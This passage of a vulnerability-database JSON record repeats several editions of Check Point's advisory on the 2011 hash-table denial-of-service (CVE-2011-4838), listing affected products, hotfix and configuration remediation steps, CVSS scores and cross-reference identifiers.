follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-01T19:17:08", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-01T19:17:08", "differentElements": ["modified", "published"], "edition": 2}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-01T23:15:01", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-01T23:15:01", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-02T03:11:03", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4885", "CVE-2011-4838"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:72454", "SSV:30071", "SSV:30001", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122001", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120218", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:863712", "OPENVAS:1361412562310881119", "OPENVAS:831554", "OPENVAS:136141256231070754", "OPENVAS:881167", "OPENVAS:1361412562310870638", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:863921", "OPENVAS:881119"]}, {"type": "nessus", "idList": ["FEDORA_2012-1262.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SOLARIS11_RUBY_20120417.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "ALA_ALAS-2012-35.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2012-0420.NASL", "FEDORA_2011-17542.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069", "CESA-2012:0093", "CESA-2012:0092"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3EA60213F3", "FEDORA:4930D21410", "FEDORA:BFF2C21133", "FEDORA:3515C213E6", "FEDORA:76D5120DE0", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0092", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-02T03:11:03", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-02T03:11:03", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-02T03:11:03", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-02T19:06:03", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4885", "CVE-2011-4838"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:72454", "SSV:30071", "SSV:30001", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122001", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120218", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:863712", "OPENVAS:1361412562310881119", "OPENVAS:831554", "OPENVAS:136141256231070754", "OPENVAS:881167", "OPENVAS:1361412562310870638", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:863921", "OPENVAS:881119"]}, {"type": "nessus", "idList": ["FEDORA_2012-1262.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SOLARIS11_RUBY_20120417.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "ALA_ALAS-2012-35.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2012-0420.NASL", "FEDORA_2011-17542.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069", "CESA-2012:0093", "CESA-2012:0092"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3EA60213F3", "FEDORA:4930D21410", "FEDORA:BFF2C21133", "FEDORA:3515C213E6", "FEDORA:76D5120DE0", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0092", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-02T03:11:03", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-02T03:11:03", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-02T19:06:03", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-02T23:10:27", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4885", "CVE-2011-4838"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:72454", "SSV:30071", "SSV:30001", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122001", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120218", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:863712", "OPENVAS:1361412562310881119", "OPENVAS:831554", "OPENVAS:136141256231070754", "OPENVAS:881167", "OPENVAS:1361412562310870638", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:1361412562310863681", 